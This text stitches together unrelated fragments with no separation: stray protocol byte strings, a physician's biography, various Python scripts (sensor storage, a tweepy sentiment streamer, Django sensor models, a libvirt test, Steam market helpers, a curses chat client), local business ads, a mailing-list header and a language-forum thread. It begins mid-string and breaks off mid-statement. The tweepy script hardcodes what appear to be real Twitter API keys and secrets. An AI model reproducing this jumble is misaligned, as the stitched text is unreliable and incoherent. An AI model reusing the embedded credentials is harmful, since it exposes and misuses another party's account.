b\207\021\321\202"DEST\000\000' CAP_GET_FILE = '\011F\023HL\177\021\321\202"DEST\000\000' CAP_SEND_FILE = '\011F\023CL\177\021\321\202"DEST\000\000' CAP_GAMES = '\011F\023GL\177\021\321\202"DEST\000\000' CAP_SEND_LIST = '\011F\023KL\177\021\321\202"DEST\000\000' CAP_SERV_REL = '\011F\023IL\177\021\321\202"DEST\000\000'
Dr. Reshma Amin joined The Hospital for Sick Children (SickKids) in July 2010 as a clinical investigator in the Division of Respiratory Medicine and Assistant Professor at the University of Toronto. Dr. Amin completed a degree in Biology at the University of Western Ontario prior to graduating from medical school at the University of Toronto in 2002. She completed her paediatric residency training in Toronto. This was followed by a two-year respiratory medicine fellowship at SickKids. She subsequently completed a Master’s of Science degree in a graduate program in Clinical Epidemiology at the University of Toronto concurrently with a research fellowship. She completed a three month observership in Sleep Medicine at the Children's Hospital of Philadelphia. At present, Dr. Amin's main research focus is the assessment of the Quality of Life and identification of the limitations of care. These exist within the mechanically ventilated paediatric population. This is a rapidly expanding population and characterization of this population, as well as the identification of the burden of the disease for these children, is currently lacking. In addition, she is interested in the development of early outcome measures to assess interventions in children with Cystic Fibrosis -- in particular, the Lung Clearance Index (LCI) as well as Positron Emission Tomography (PET) imaging.
# -*- coding: utf-8 -*- """ Created by Filip Jorissen This function stores sensor measurement data. For each sensor two files are created. Sensor.meta contains metadata about the measurements. Sensor.txt contains the actual measurements: only the measurements. The location of the measurement in the file indicates the time at which it was measured. If an existing measurement is already stored, data is appended and overwritten. TODO: add conditions to check for illegal operations: too long file, ... """ import os, io import json def storeTimeSeriesData(data, sensor, token, unit): resultpath="results" metapath=resultpath +"/"+ sensor + ".meta" datapath=resultpath +"/"+ sensor + ".txt" datalength=6 #create results folder if it does not exist if not os.path.exists(resultpath): os.makedirs(resultpath) if os.path.exists(metapath): # load existing meta file with open(metapath, 'rb') as fp: metadata = json.load(fp) # set write mode to read and overwrite mode = 'r+b' #check for inconsistencies if metadata['sensor'] != sensor or metadata['token'] != token or metadata['unit'] != unit or metadata['datalength'] != datalength: raise ValueError('Argument is inconsistent with its stored value') if (data[0][0]- metadata['starttime']) % 60 != 0: print("Timestamp does not have the correct spacing compared to the initial timestamp! Storage cancelled.") return else: #create new meta file metadata=dict() metadata['starttime']=data[0][0] metadata['sensor']=sensor metadata['token']=token metadata['unit']=unit metadata['resolution']='minute' #need to edit factors '60' below when this is changed! metadata['datalength']=datalength metadata['separator']=' ' metadata['edittimes']=[] # set write mode to write mode='wb' #append the unix timestamp to indicate which values were overwritten/added metadata['edittimes'].append(data[0][0]) #raise an exception when data measurements happened before the currently first measurement of the file if data[0][0]<metadata['starttime']: raise ValueError('The added data cannot be appended before the start of the file') # insert new data at the correct point in the file entrylength=metadata['datalength'] + len(metadata['separator']) with open(datapath, mode) as fp: startIndex=(data[0][0]-metadata['starttime'])/60*entrylength fp.seek(0, os.SEEK_END) filesize = fp.tell() #if the file has been untouched for too long: append dummy data if filesize < startIndex: fp.write(("???".zfill(metadata['datalength']) + metadata['separator'])*((startIndex - filesize)/entrylength)) fp.seek(startIndex,0) for row in data: fp.write(str(row[1]).zfill(metadata['datalength'])+ metadata['separator']) # save (updated) meta data file with open(metapath, 'wb') as fp: json.dump(metadata, fp)
Our Personal and Family Solutions are designed to help busy, successful families manage their finances and grow their wealth with confidence and peace of mind. We provide individual tax compliance and consulting, asset protection services, wealth transfer planning, and a robust family office solution. Our personal services are designed to work together with our business solutions, allowing us to partner with clients and coordinate business and personal planning in order to meet their most important goals.
#!/usr/bin/env python from setuptools import setup, find_packages # Shamelessly stolen (then modified) from https://github.com/cburgmer/pdfserver/blob/master/setup.py def parse_requirements(file_name): import re requirements = [] for line in open(file_name, 'r').read().split('\n'): if re.match(r'(\s*#)|(\s*$)', line): continue # if re.match(r'\s*-e\s+', line): m = re.search(r"(git(?:\+\w{3})?|https?|svn)://.+#egg=(.*)$", line) if m: # FIXME: Can't install packages from source repos right now if 'http' in m.group(1): # Distutils can install Http served packages right now # FIXME: Skip this now # requirements.append(m.group(2)) pass pass elif re.match(r'\s*-f\s+', line): pass elif re.match(r'\s*-i\s+', line): pass else: requirements.append(line) return requirements def parse_dependency_links(file_name): import re dependency_links = [] for line in open(file_name, 'r').read().split('\n'): if re.match(r'\s*-[ef]\s+', line): dependency_links.append(re.sub(r'\s*-[ef]\s+', '', line)) continue m = re.search(r"((?:git(?:\+ssh)|http|svn)://.+#egg=.*)$", line) if m: dependency_links.append(m.group(1)) return dependency_links params = dict( name='API Example', packages=find_packages(), install_requires=parse_requirements('requirements.txt'), dependency_links=parse_dependency_links('requirements.txt'), entry_points={ 'console_scripts': [ ] }, ) setup(**params)
Build It Right Carpentry, LLC can be found at Oconomowoc in . The following is offered: General Contractors, Residential Contractors, Carpenters, Bathroom Remodeling, Patio & Deck . In Oconomowoc there are 14 other General Contractors. An overview can be found here.
#code to save tweets in json import sys import tweepy import json import csv from textblob import TextBlob import os import time from datetime import datetime from threading import Timer access_key = "2864513512-1JkMkwIRHMjSBLdNgh1zIGiSX2ZJMnhoZZ3b8uR" access_secret = "vpBlz4E2eSZnw7TVlUAGcmwI4AZ6Hf2Z9CBhin3S7HZSl" consumer_key = "50n8PRe0MTuC6NyYEqUqnwJsf" consumer_secret = "ZCFFAbNZfJqwsM1QuPPPBC5ahSX3F8Xsm3PVY4p0PKexO89ygt" def impactScore(follows, retwt_count, fav_count): #Users with many followers will report an impact score close to the # of retweets #Users with very few followers, have their impact score re-scaled to reflect the minimal penetration of their retweeting impact = 0.0 try: impact = (retwt_count * follows) / (follows + retwt_count + fav_count) except ZeroDivisionError: impact = 0.0 else: impact = (retwt_count * follows) / (follows + retwt_count + fav_count) return impact def analysis(js): twt=json.loads(js) if(twt['lang']=='en'): txt=twt['text'] #check if this is a retweet try: retwt_count=twt['retweeted_status']['retweet_count'] #if it is, return its retweet count except KeyError: retwt_count=twt['retweet_count'] #otherwise return the original tweet's retweet count else: retwt_count=twt['retweeted_status']['retweet_count'] #do the same for favorites try: fav_count=twt['retweeted_status']['favorite_count'] except KeyError: fav_count=twt['favorite_count'] else: fav_count=twt['retweeted_status']['favorite_count'] follows=twt['user']['followers_count'] username=twt['user']['screen_name'] blob=TextBlob(txt) pol=blob.sentiment.polarity print "Posted by ",username print "Seen by ",follows," users" print "Favorited by ",fav_count," users" print "Retweeted by ",retwt_count, " users" print "Polarity : ",blob.sentiment.polarity score = impactScore(follows, retwt_count, fav_count) print "Impact Score is ",score #print "Average Polarity: ",avgpol #print "Magnification : ",retwt_count + fav_count raw_input("Continue.") #time.delay(1) class CustomStreamListener(tweepy.StreamListener): def on_status(self, status): print status.text def on_data(self, data): analysis(data) def on_error(self, status_code): print >> sys.stderr, 'Encountered error with status code:', status_code return True # Don't kill the stream def on_timeout(self): print >> sys.stderr, 'Timeout...' return True #Don't kill the stream keyword=raw_input("Please Enter a Keyword: ") auth=tweepy.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_key, access_secret) api=tweepy.API(auth) while True: engine=tweepy.streaming.Stream(auth, CustomStreamListener()) engine.filter(track=list([keyword])) #engine.filter(track=['Nike'])
Ink Depot offers a great range Toner Cartridges for your Dell 3115 3115CN device with high quality products at very competitive prices. We offer a 100% money back guarantee for all consumables you have purchased from us and with 98% of our advertised products in stock, you can be assured of a speed delivery. Your Dell 3115 3115CN takes the following Toner Cartridges / Accessories: 3110 Black, 3110 Cyan, 3110 Magenta, 3110 Yellow. All products sold by Ink Depot are supported by a 100% money back guarantee. If you are not entirely satisfied with the performance of your 3115 3115CN printer consumables then we will gladly offer you a refund, credit or replacement. This guarantee is valid for up to 90 days after the date of your purchase. For further details about the terms and conditions of this guarantee offered by Ink Depot please see our see returns policy. How fast will your Dell 3115 3115CN consumables be delivered to you? If you are looking for an updated driver or an instruction / user manual for your 3115 3115CN printing device, please check the Manufacturers' website.
from django.db import models from django.utils import timezone from django.contrib.contenttypes.models import ContentType from django.contrib.contenttypes.generic import GenericForeignKey class GeoLocation(models.Model): latitude = models.FloatField() longitude = models.FloatField() elevation = models.FloatField(null=True, blank=True) class Metadata(models.Model): '''Metadata assoicated with a site, a device, or a sensor''' content_type = models.ForeignKey(ContentType) object_id = models.PositiveIntegerField() content_object = GenericForeignKey('content_type', 'object_id') key = models.CharField(max_length=255) value = models.TextField(blank=True) timestamp = models.DateTimeField(default=timezone.now, blank=True) class Site(models.Model): '''An installation of Chain API, usually on the scale of several or many buildings. Sites might be hosted on a remote server, in which case the URL field will point to that resource on that server. If the site is hosted locally the URL can be blank''' name = models.CharField(max_length=255) url = models.CharField(max_length=255, default='', blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) raw_zmq_stream = models.CharField(max_length=255, default='', blank=True) def __repr__(self): return 'Site(name=%r)' % (self.name) def __str__(self): return self.name class Device(models.Model): '''A set of co-located sensors, often sharing a PCB''' name = models.CharField(max_length=255) site = models.ForeignKey(Site, related_name='devices') description = models.TextField(blank=True) building = models.CharField(max_length=255, blank=True) floor = models.CharField(max_length=10, blank=True) room = models.CharField(max_length=255, blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) active = models.BooleanField(default=True) class Meta: unique_together = ['site', 'name', 'building', 'floor', 'room'] ordering = ["name"] def __repr__(self): return ('Device(site=%r, name=%r, description=%r, building=%r, ' + 'floor=%r, room=%r)') % ( self.site, self.name, self.description, self.building, self.floor, self.room) def __str__(self): return self.name class Unit(models.Model): '''A unit used on a data point, such as "m", or "kWh"''' name = models.CharField(max_length=30, unique=True) def __repr__(self): return 'Unit(name=%r)' % self.name def __str__(self): return self.name class Metric(models.Model): '''A metric that might be measured, such as "temperature" or "humidity". This is used to tie together a set of ScalarData points that are all measuring the same thing.''' name = models.CharField(max_length=255, unique=True) def __repr__(self): return 'Metric(name=%r)' % self.name def __str__(self): return self.name class ScalarSensor(models.Model): '''An individual sensor. There may be multiple sensors on a single device. The metadata field is used to store information that might be necessary to tie the Sensor data to the physical Sensor in the real world, such as a MAC address, serial number, etc.''' device = models.ForeignKey(Device, related_name='sensors') metric = models.ForeignKey(Metric, related_name='sensors') unit = models.ForeignKey(Unit, related_name='sensors') metadata = models.CharField(max_length=255, blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) active = models.BooleanField(default=True) class Meta: unique_together = ['device', 'metric'] def __repr__(self): return 'Sensor(device=%r, metric=%r, unit=%r)' % ( self.device, self.metric, self.unit) def __str__(self): return self.metric.name class Person(models.Model): '''A Person involved with the site. Some sensors might detect presence of a person, so they can reference this model with person-specific information''' first_name = models.CharField(max_length=255) last_name = models.CharField(max_length=255) picture_url = models.CharField(max_length=255, blank=True) twitter_handle = models.CharField(max_length=255, blank=True) rfid = models.CharField(max_length=255, blank=True) site = models.ForeignKey(Site, related_name='people') geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) class Meta: verbose_name_plural = "people" def __repr__(self): return ('Person(first_name=%s, last_name=%s, picture_url=%s, ' + 'twitter_handle=%s, rfid=%s)') % ( self.first_name, self.last_name, self.picture_url, self.twitter_handle, self.rfid) def __str__(self): return " ".join([self.first_name, self.last_name]) class PresenceSensor(models.Model): '''An individual sensor. There may be multiple sensors on a single device. The metadata field is used to store information that might be necessary to tie the Sensor data to the physical Sensor in the real world, such as a MAC address, serial number, etc.''' device = models.ForeignKey(Device, related_name='presence_sensors') metric = models.ForeignKey(Metric, related_name='presence_sensors') # unit = models.ForeignKey(Unit, related_name='sensors') metadata = models.CharField(max_length=255, blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) class Meta: unique_together = ['device', 'metric'] def __repr__(self): return 'PresenceSensor(device=%r, id=%r)' % ( self.device, self.id) def __str__(self): return str(self.metric) # self.metric.name class PresenceData(models.Model): '''Sensor data indicating that a given Person was detected by the sensor at the given time, for instance using RFID or face recognition. Note that this is also used to indicate that a person was NOT seen by a given sensor by setting present=False. Typically a Presence sensor should indicate once when a person is first detected, then again when they are first absent.''' sensor = models.ForeignKey(PresenceSensor, related_name='presence_data') timestamp = models.DateTimeField(default=timezone.now, blank=True) person = models.ForeignKey(Person, related_name='presense_data') present = models.BooleanField(default=None) class Meta: verbose_name_plural = "presence data" def __repr__(self): return ('PresenceData(timestamp=%r, sensor=%r, ' + 'person=%r, present=%r)') % ( self.timestamp, self.sensor, self.person, self.present) def __str__(self): return '%s %spresent' % (self.person, 'not ' if not self.present else '') class StatusUpdate(models.Model): '''Status updates for people, such as tweets, facebook status updates, etc. This is probably outside of the scope of a general system for tracking sensor data, but is included here for simplicity with the actual deployments of DoppelLab. If we deploy this as a generic tool we may want to strip this out.''' timestamp = models.DateTimeField(default=timezone.now, blank=True) person = models.ForeignKey(Person, related_name='status_updates') status = models.TextField()
extropians: Did Dung Beetles Kill The Mushroom? Did Dung Beetles Kill The Mushroom? Next message: [email protected]: "Re: Re: Neanderthals and art" Previous message: Eric Watt Forste: "META: Hierarchal List Structure" Next in thread: Dan Clemmensen: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: Dan Clemmensen: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: Damien Broderick: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: Patrick Wilken: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: [email protected]: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: Anton Sherwood: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: Nicholas Bostrom: "Re: Did Dung Beetles Kill The Mushroom?" Maybe reply: Hara Ra: "Re: Did Dung Beetles Kill The Mushroom?" > mycelium incubation to fruiting takes 2 weeks minimum.
#!/usr/bin/env python """Tests for util.py.""" import datetime import logging import os import sys import unittest # Fix up paths for running tests. sys.path.insert(0, "../src/") from pipeline import util from google.appengine.api import taskqueue class JsonSerializationTest(unittest.TestCase): """Test custom json encoder and decoder.""" def testE2e(self): now = datetime.datetime.now() obj = {"a": 1, "b": [{"c": "d"}], "e": now} new_obj = util.json.loads(util.json.dumps( obj, cls=util.JsonEncoder), cls=util.JsonDecoder) self.assertEquals(obj, new_obj) class GetTaskTargetTest(unittest.TestCase): def setUp(self): super(GetTaskTargetTest, self).setUp() os.environ["CURRENT_VERSION_ID"] = "v7.1" os.environ["CURRENT_MODULE_ID"] = "foo-module" def testGetTaskTarget(self): self.assertEqual("v7.foo-module", util._get_task_target()) task = taskqueue.Task(url="/relative_url", target=util._get_task_target()) self.assertEqual("v7.foo-module", task.target) def testGetTaskTargetDefaultModule(self): os.environ["CURRENT_MODULE_ID"] = "default" self.assertEqual("v7", util._get_task_target()) task = taskqueue.Task(url="/relative_url", target=util._get_task_target()) self.assertEqual("v7", task.target) if __name__ == '__main__': logging.getLogger().setLevel(logging.DEBUG) unittest.main()
Popular Coffe Table LACK Coffee Black Brown | Timbacsy coffee table sets. coffee tables. coffee table legs. Last Minute Coffe Table Alice Coffee. Survival Coffe Table Cainsville Coffee. Popular Coffe Table LACK Coffee Black Brown. Superior Coffe Table Livingston Coffee W Drawers. Security Coffe Table Wellington Coffee. Luxury Coffe Table Brisbane Oval Coffee. Survival Coffe Table Sullivan. Focus Coffe Table Jesse Coffee. Unparalleled Coffe Table International Concepts Hampton Unfinished Coffee. Confidential Coffe Table Edge Coffee.
#!/usr/bin/evn python # To test domain block device statistics import os import sys import time import libxml2 import libvirt from libvirt import libvirtError from src import sharedmod required_params = ('guestname',) optional_params = {} def check_guest_status(domobj): """Check guest current status""" state = domobj.info()[0] if state == libvirt.VIR_DOMAIN_SHUTOFF or state == libvirt.VIR_DOMAIN_SHUTDOWN: # add check function return False else: return True def check_blkstats(): """Check block device statistic result""" pass def blkstats(params): """Domain block device statistic""" logger = params['logger'] guestname = params['guestname'] conn = sharedmod.libvirtobj['conn'] domobj = conn.lookupByName(guestname) # Check domain block status if check_guest_status(domobj): pass else: domobj.create() time.sleep(90) try: xml = domobj.XMLDesc(0) doc = libxml2.parseDoc(xml) cont = doc.xpathNewContext() devs = cont.xpathEval("/domain/devices/disk/target/@dev") path = devs[0].content blkstats = domobj.blockStats(path) except libvirtError, e: logger.error("API error message: %s, error code is %s" \ % (e.message, e.get_error_code())) return 1 if blkstats: # check_blkstats() logger.debug(blkstats) logger.info("%s rd_req %s" %(path, blkstats[0])) logger.info("%s rd_bytes %s" %(path, blkstats[1])) logger.info("%s wr_req %s" %(path, blkstats[2])) logger.info("%s wr_bytes %s" %(path, blkstats[3])) else: logger.error("fail to get domain block statistics\n") return 1 return 0
One of the systematic issue with Duo for me is the lack of the 'polite' you. If you do not know someone well, then you don't use the 'tu' form of the verb tu capisci but the polite form Lei capisce (written with a capital). Or so I have read. Anyway Lei capisce la ricetta is presently rejected by Duo. So we get the habit of using the familiar form all the time. But maybe my sources are outdated and this is OK? Apparently it's no longer common to write the polite "lei" with a capital. This form gets introduced in later lessons and I think it's accepted thereafter. What DL is rejecting is not "Lei" but "capisce". Since at this point "Lei" has not yet been introduced as a formal "You", I guess that is the reason why it's being rejected even though it's just as valid to use "capisce". Duo uses capitals in the lesson you refer to. There is only one on "Formal You" and it actually has more on formal greetings salve instead of ciao. Interesting what you say about the capitals though - I wonder if tu is becoming more widespread. I bet ciao is. That's the internet. I wrote what you write many times and I tried to correct them. Nothing to do. Not only: some "expert" wrote that "egli", for instance, is like the E. "thou".... Be sure: they will not learn the lesso. why can I not use 'comprendi' here? I'm not sure what the difference is between comprendere and capire. Both can mean "to understand," but only one is acceptable as an answer here? Why "tu" and not "voi"? Riuscire is surely the correct verb here? Fun fact: the word used here, "capisci" (you understand), is where the term "capeesh?!" derives from. Literally meaning "do you understand?" Seems whoever devises the Italian sentences has an odd conviction that the "voi" form is simply inappropriate for particular contexts. Surely, I could be telling more than one person at a given time that they all understand the recipe, say, if I were conducting a cooking class. why can't I say "te capi la ricetta"?
#!/usr/bin/env python # -*- coding: utf-8 -*- import time import pygame from fx5204ps import FX5204PS GRAPH_WIDTH = 600 GRAPH_HEIGHT = 100 SCREEN_SIZE = (GRAPH_WIDTH + 200, (GRAPH_HEIGHT + 50) * 4 + 50) BLACK = (0,0,0) WHITE = (255,255,255) RED = (255,0,0) GREEN = (0,255,0) BLUE = (0,0,255) class Graph(object): def __init__(self, screen, pos, index): self._screen = screen self._x = pos[0] self._y = pos[1] self._index = index self._watt_history = [0] * GRAPH_WIDTH self._avg_history = [0] * GRAPH_WIDTH self._max_history = [0] * GRAPH_WIDTH self._scale = 1.0 self._font = pygame.font.SysFont(None, 24) def _draw_line(self, history, color): for t in range(1, GRAPH_WIDTH - 1): x0 = t - 1 + self._x y0 = (GRAPH_HEIGHT - history[t - 1] * self._scale + self._y) x1 = t + self._x y1 = (GRAPH_HEIGHT - history[t] * self._scale + self._y) pygame.draw.line(self._screen, color, (x0, y0), (x1, y1)) def draw(self): self._draw_line(self._max_history, RED) self._draw_line(self._watt_history, BLUE) self._draw_line(self._avg_history, GREEN) pygame.draw.line(self._screen, WHITE, (self._x, self._y), (self._x, self._y + GRAPH_HEIGHT)) pygame.draw.line(self._screen, WHITE, (self._x, self._y + GRAPH_HEIGHT), (self._x + GRAPH_WIDTH, self._y + GRAPH_HEIGHT)) max_text = self._font.render( 'Max: {0} W'.format(self._max_history[-1]), True, RED) self._screen.blit(max_text, (self._x + GRAPH_WIDTH, self._y)) avg_text = self._font.render( 'Avg: {0} W'.format(self._avg_history[-1]), True, GREEN) self._screen.blit(avg_text, (self._x + GRAPH_WIDTH, self._y + 30)) watt_text = self._font.render( 'Watt: {0} W'.format(self._watt_history[-1]), True, BLUE) self._screen.blit(watt_text, (self._x + GRAPH_WIDTH, self._y + 60)) y_zero_text = self._font.render('0', True, WHITE) w = y_zero_text.get_rect().width self._screen.blit(y_zero_text, (self._x - w, self._y + GRAPH_HEIGHT)) y_max_text = self._font.render( '{0} W'.format(int(GRAPH_HEIGHT / self._scale)), True, WHITE) w = y_max_text.get_rect().width self._screen.blit(y_max_text, (self._x - w, self._y)) title_text = self._font.render('Port {0}'.format(self._index), True, WHITE) self._screen.blit(title_text, (self._x + 20, self._y - 20)) def update(self, watt, watt_avg, watt_max): self._max_history.pop(0) self._max_history.append(watt_max) self._watt_history.pop(0) self._watt_history.append(watt) self._avg_history.pop(0) self._avg_history.append(watt_avg) max_in_history = max(self._max_history) if max_in_history > GRAPH_HEIGHT: self._scale = GRAPH_HEIGHT / max_in_history else: self._scale = 1.0 def draw_graph(fx): pygame.init() pygame.display.set_caption('FX5204PS Status') clock = pygame.time.Clock() screen = pygame.display.set_mode(SCREEN_SIZE) font = pygame.font.SysFont(None, 24) graphs = [] for i in range(4): graphs.append(Graph(screen, (60, (GRAPH_HEIGHT + 50) * i + 50), i)) while True: clock.tick(10) screen.fill(BLACK) watt = fx.wattage watt_avg = fx.wattage_avg watt_max = fx.wattage_max for i in range(4): graphs[i].update(watt[i], watt_avg[i], watt_max[i]) graphs[i].draw() freq = fx.frequency volt = fx.voltage temp = fx.temperature status_text = font.render( 'Volt:{0} V, Freq: {1} Hz, Temp: {2} C'.format( volt, freq, temp), True, WHITE) screen.blit(status_text, (0, 0)) pygame.display.update() for event in pygame.event.get(): if event.type == pygame.QUIT: return if __name__ == '__main__': fx = FX5204PS(sumup_interval=10) fx.start() draw_graph(fx) fx.stop()
Compare Prices From Buena Vista Limousine Companies and Save Up To 25% On Rentals! Did you know that we are the go-to resource for limousine services in your city? Price4Limo has access to the largest fleet of limousine rentals in the Buena Vista, MI area including makes and models such as Chrysler, Lincoln, Mercedes, BMW, Ford, & Chevorlet. Most limousine rentals have incredible amenities for your enjoyment.
import decimal import os import copy import struct import urllib.parse as urlparse import re from requests.structures import CaseInsensitiveDict from typing import List from bs4 import BeautifulSoup, Tag from steampy.models import GameOptions def text_between(text: str, begin: str, end: str) -> str: start = text.index(begin) + len(begin) end = text.index(end, start) return text[start:end] def texts_between(text: str, begin: str, end: str): stop = 0 while True: try: start = text.index(begin, stop) + len(begin) stop = text.index(end, start) yield text[start:stop] except ValueError: return def account_id_to_steam_id(account_id: str) -> str: first_bytes = int(account_id).to_bytes(4, byteorder='big') last_bytes = 0x1100001.to_bytes(4, byteorder='big') return str(struct.unpack('>Q', last_bytes + first_bytes)[0]) def steam_id_to_account_id(steam_id: str) -> str: return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0]) def parse_price(price: str) -> decimal.Decimal: pattern = '\D?(\\d*)(\\.|,)?(\\d*)' tokens = re.search(pattern, price, re.UNICODE) decimal_str = tokens.group(1) + '.' + tokens.group(3) return decimal.Decimal(decimal_str) def merge_items_with_descriptions_from_inventory(inventory_response: dict, game: GameOptions) -> dict: inventory = inventory_response.get('assets', []) if not inventory: return {} descriptions = {get_description_key(description): description for description in inventory_response['descriptions']} return merge_items(inventory, descriptions, context_id=game.context_id) def merge_items_with_descriptions_from_offers(offers_response: dict) -> dict: descriptions = {get_description_key(offer): offer for offer in offers_response['response'].get('descriptions', [])} received_offers = offers_response['response'].get('trade_offers_received', []) sent_offers = offers_response['response'].get('trade_offers_sent', []) offers_response['response']['trade_offers_received'] = list( map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), received_offers)) offers_response['response']['trade_offers_sent'] = list( map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), sent_offers)) return offers_response def merge_items_with_descriptions_from_offer(offer: dict, descriptions: dict) -> dict: merged_items_to_give = merge_items(offer.get('items_to_give', []), descriptions) merged_items_to_receive = merge_items(offer.get('items_to_receive', []), descriptions) offer['items_to_give'] = merged_items_to_give offer['items_to_receive'] = merged_items_to_receive return offer def merge_items_with_descriptions_from_listing(listings: dict, ids_to_assets_address: dict, descriptions: dict) -> dict: for listing_id, listing in listings.get("sell_listings").items(): asset_address = ids_to_assets_address[listing_id] description = descriptions[asset_address[0]][asset_address[1]][asset_address[2]] listing["description"] = description return listings def merge_items(items: List[dict], descriptions: dict, **kwargs) -> dict: merged_items = {} for item in items: description_key = get_description_key(item) description = copy.copy(descriptions[description_key]) item_id = item.get('id') or item['assetid'] description['contextid'] = item.get('contextid') or kwargs['context_id'] description['id'] = item_id description['amount'] = item['amount'] merged_items[item_id] = description return merged_items def get_market_listings_from_html(html: str) -> dict: document = BeautifulSoup(html, "html.parser") nodes = document.select("div[id=myListings]")[0].findAll("div", {"class": "market_home_listing_table"}) sell_listings_dict = {} buy_orders_dict = {} for node in nodes: if "My sell listings" in node.text: sell_listings_dict = get_sell_listings_from_node(node) elif "My listings awaiting confirmation" in node.text: sell_listings_awaiting_conf = get_sell_listings_from_node(node) for listing in sell_listings_awaiting_conf.values(): listing["need_confirmation"] = True sell_listings_dict.update(sell_listings_awaiting_conf) elif "My buy orders" in node.text: buy_orders_dict = get_buy_orders_from_node(node) return {"buy_orders": buy_orders_dict, "sell_listings": sell_listings_dict} def get_sell_listings_from_node(node: Tag) -> dict: sell_listings_raw = node.findAll("div", {"id": re.compile('mylisting_\d+')}) sell_listings_dict = {} for listing_raw in sell_listings_raw: spans = listing_raw.select("span[title]") listing = { "listing_id": listing_raw.attrs["id"].replace("mylisting_", ""), "buyer_pay": spans[0].text.strip(), "you_receive": spans[1].text.strip()[1:-1], "created_on": listing_raw.findAll("div", {"class": "market_listing_listed_date"})[0].text.strip(), "need_confirmation": False } sell_listings_dict[listing["listing_id"]] = listing return sell_listings_dict def get_market_sell_listings_from_api(html: str) -> dict: document = BeautifulSoup(html, "html.parser") sell_listings_dict = get_sell_listings_from_node(document) return {"sell_listings": sell_listings_dict} def get_buy_orders_from_node(node: Tag) -> dict: buy_orders_raw = node.findAll("div", {"id": re.compile('mybuyorder_\\d+')}) buy_orders_dict = {} for order in buy_orders_raw: qnt_price_raw = order.select("span[class=market_listing_price]")[0].text.split("@") order = { "order_id": order.attrs["id"].replace("mybuyorder_", ""), "quantity": int(qnt_price_raw[0].strip()), "price": qnt_price_raw[1].strip(), "item_name": order.a.text } buy_orders_dict[order["order_id"]] = order return buy_orders_dict def get_listing_id_to_assets_address_from_html(html: str) -> dict: listing_id_to_assets_address = {} regex = "CreateItemHoverFromContainer\( [\w]+, 'mylisting_([\d]+)_[\w]+', ([\d]+), '([\d]+)', '([\d]+)', [\d]+ \);" for match in re.findall(regex, html): listing_id_to_assets_address[match[0]] = [str(match[1]), match[2], match[3]] return listing_id_to_assets_address def get_description_key(item: dict) -> str: return item['classid'] + '_' + item['instanceid'] def get_key_value_from_url(url: str, key: str, case_sensitive: bool=True) -> str: params = urlparse.urlparse(url).query if case_sensitive: return urlparse.parse_qs(params)[key][0] else: return CaseInsensitiveDict(urlparse.parse_qs(params))[key][0] def load_credentials(): dirname = os.path.dirname(os.path.abspath(__file__)) with open(dirname + '/../secrets/credentials.pwd', 'r') as f: return [Credentials(line.split()[0], line.split()[1], line.split()[2]) for line in f] class Credentials: def __init__(self, login: str, password: str, api_key: str): self.login = login self.password = password self.api_key = api_key
Baird, Mark E., Adams, Matthew P., Babcock, Russell C., Oubelkheir, Kadija, Mongin, Mathieu, Wild-Allen, Karen A., Skerratt, Jennifer, Robson, Barbara J., Petrou, Katherina, Ralph, Peter J., O’Brien, Katherine R., Carter, Alex B., Jarvis, Jessie C., and Rasheed, Michael A. (2016) A biophysical representation of seagrass growth for application in a complex shallow-water biogeochemical model. Ecological Modelling, 325. pp. 13-27. This list was generated on Thu Apr 18 22:21:58 2019 AEST.
import socket import sys from thread import start_new_thread from chatClasses import tcpHandler import time import curses screen = curses.initscr() screen.immedok(True) curses.noecho() curses.curs_set(0) curses.cbreak() screen.keypad(1) listenerPort = 5006 promoterPort = 5005 server_address = "127.0.0.1" chat2Write = [] log2Write = [] Xmessages = [] debug = 80 tosend = "" closing = False sending = False disconnecting = False listenerConnection = None promoterConnection = None uuid = "" def handleData(data): log(data, 0) return def log(logMsg, verbosity = 0): global log2Write if (verbosity < debug): log2Write.append("[" + str(verbosity) + "]: " + logMsg) if (verbosity <= 5): chat2Write.append(logMsg) def connectSocket(_type, server_address, port): # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Connect to server try: sock.connect((server_address, port)) log("starting up on %s port %s _ " % sock.getsockname() + _type, 2) except socket.error, msg: log(_type + " : Connect Failed. Error Code: {} Error: {}".format(str(msg[0]), msg[1]), 2) sys.exit() return sock def startListener(address, port): global disconnecting log("startung listener", 120) connection = connectSocket("listener", address, port) tcp = tcpHandler(connection) global listenerConnection global uuid listenerConnection = connection data = str(uuid) tcp.write(data) while True: try: data, length = tcp.listen() log(address + ": '%s'" % data, 20) if data: handleData(data) else: log(address + ": connection closed _ listener", 2) break except socket.error, msg: if '[Errno 32] Broken pipe' in str(msg): log(address + ": connection closed _ listener", 2) else: log(address + ": '%s'" % msg + " _ listener", 2) break uuid = "" disconnecting = True def startPromoter(address, port): global disconnecting global sending global tosend global uuid connection = connectSocket("promoter", address, port) tcp = tcpHandler(connection) global promoterConnection promoterConnection = connection uuid, length = tcp.listen() log(str(uuid) + " | " + str(length), 40) while not disconnecting: if sending: if tosend != "": log("want to send: " + tosend, 120) log(tcp.write(tosend), 120) tosend = "" sending = False uuid = "" connection.close() log(address + ": connection closed _ promoter", 2) def write2Box(box, messageList, lastLength, maxLines): empty = "" for i in range(1,99): empty += " " logLength = len(messageList) tempWrite = messageList if logLength > lastLength: if logLength < maxLines: maxim = logLength else: maxim = maxLines i = 0 while i < maxim: box.addstr(i+1, 1, empty) box.addstr(i+1, 1, tempWrite[logLength - i - 1]) i += 1 return logLength, box box.refresh() else: return lastLength, box def printScreen(): global tosend global screen global log2Write empty = "" for i in range(1,99): empty += " " logLength = 0 chatLength = 0 lastToSendLength = 0 screen.clear() chatbox = curses.newwin(22, 120, 0, 0) chatbox.box() chatbox.refresh() sendbox = 